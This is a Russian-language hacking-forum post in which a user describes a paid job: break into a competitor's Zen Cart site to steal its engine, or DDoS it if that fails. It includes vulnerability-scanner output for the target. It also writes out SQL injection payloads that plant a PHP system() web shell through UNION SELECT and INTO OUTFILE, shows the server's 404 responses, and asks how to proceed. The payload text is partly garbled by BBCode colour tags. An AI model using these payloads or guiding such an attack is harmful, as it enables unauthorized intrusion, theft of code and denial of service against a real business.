Показать сообщение отдельно

  #324  
Старый 29.07.2011, 10:09
war.driver
Новичок
Регистрация: 28.11.2010
Сообщений: 9
С нами: 8134166

Репутация: 0
По умолчанию

Мужики, в общем дело такое: пришёл заказ. Сабж не указываю по понятным причинам. Задача-достать движок, который разумеется конкурент конкуренту не продаст. Коммерсанты херовы, млин. Если не получится достать движ-то ДДоС. Ну ладно, полез просто посмотреть, хоть и не совсем мой профиль, но расти-то надо всегда. С БТ дружу понемногу, но начал с SSS на винде. Он мне дал следующее:

1 CGI Scripts : Zen Cart Multiple File Include Vulnerabilities

Порт 80

Описание Zen Cart is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.An attacker can exploit these issues to include arbitrary remote and local files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.These issues affect version 1.3.0.2 and prior; other versions may also be vulnerable.

Как исправить Upgrading to the most recent version of Zen Cart.

Уровень риска Высокий

Ссылки Zen Cart Homepage

Скрипт http://subj.ru/index.php?

CVE CVE-MAP-NOMATCH

Bugtraq ID 19543

.............

2 Mail Servers : SMTP without AuthLogin

Порт 2500

Описание An SMTP service supports SMTP without AuthLogin.

Как исправить Install authlogin.

Уровень риска Низкий

.............

3 Web Servers : The list of E-Mail

Порт 80

Описание Found E-Mail on web site

Уровень риска Информационный

E-Mail //mail@subj.ru/

CVE GENERIC-MAP-NOMATCH

............

Всё в степени от высокого до низкого. Ну, думаю, делать нечего-полез в сеть по "красному коду", хоть и понимаю, что "боян". Ачат курил и курю, вот тут по вопросу о Zen Cart нашел у г-на DIAgen'а следующее:

1

Код HTML:
admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+s ystem%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0
, на что сабж ответил:

Код HTML:
Not Found    The requested URL /admin/password_forgotten.php POST admin_email='UNION+SELECT+0,0,'',0 was not found on this server.    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
.

После апробации второго варианта воздействия а-ля

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]INTO[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]OUTFILE[/COLOR][COLOR="#007700"]+%[/COLOR][COLOR="#0000BB"]27shell[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]force_table_err[/COLOR][COLOR="#007700"]or%[/COLOR][COLOR="#0000BB"]2F[/COLOR][COLOR="#007700"]*&[/COLOR][COLOR="#0000BB"]submit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]resend[/COLOR][/COLOR
мне сабжем было сказано:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Not Found The requested URL[/COLOR][COLOR="#007700"]/+[/COLOR][COLOR="#0000BB"]INTO[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]OUTFILE[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#DD0000"]'shell.php'[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]force_table_err[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#FF8000"]/*&submit=resend was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.[/COLOR][/COLOR] 
. Я подумал, что мб ошибся и дал ему всё одной строкой, на что получил

PHP код:
[COLOR="#000000"]Not Found The requested URL /admin/password_forgotten.php POST admin_email='UNION+SELECT+0,0,'[COLOR="#0000BB"][/COLOR]',0 +INTO+OUTFILE+'shell.php'+FROM+force_table_err or/*&submit=resend was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.[/COLOR] 
. В общем, я "интуитивно догадываюсь" (с), что нужно по уму лезть в линь, и собирать "пальцы" оси и тд, но согласитесь это не имеет смысла, учитывая что не умеешь эксплуатировать уязвимость. Я в состоянии запустить nmap или любой другой сканер, и собрать эту информацию, но без адвайза это делу не поможет, согласитесь. Я всё же больше по выпечке, хоть и хочется расти над собой.

Так как я не любитель получать всё "искаропки" и не школоло, которому вечно нужна кнопка взлома интернета прошу указания\совета\какие данные мне нужно собрать о сабже, чтобы двигаться дальше, либо какими утилитами эксплуатировать сабж. Имею свой домен, возможность поставить шелл есть. Подписался не столько за деньги, сколько за опыт, чего и вам желаю. Набившего оскомину "заранее спасибо" писать не буду, но буду благодарен за любое указание верного направления, т.к. помощь требуется в основном в том, какова последовательность шагов и утилит, назовем это так.
 
Ответить с цитированием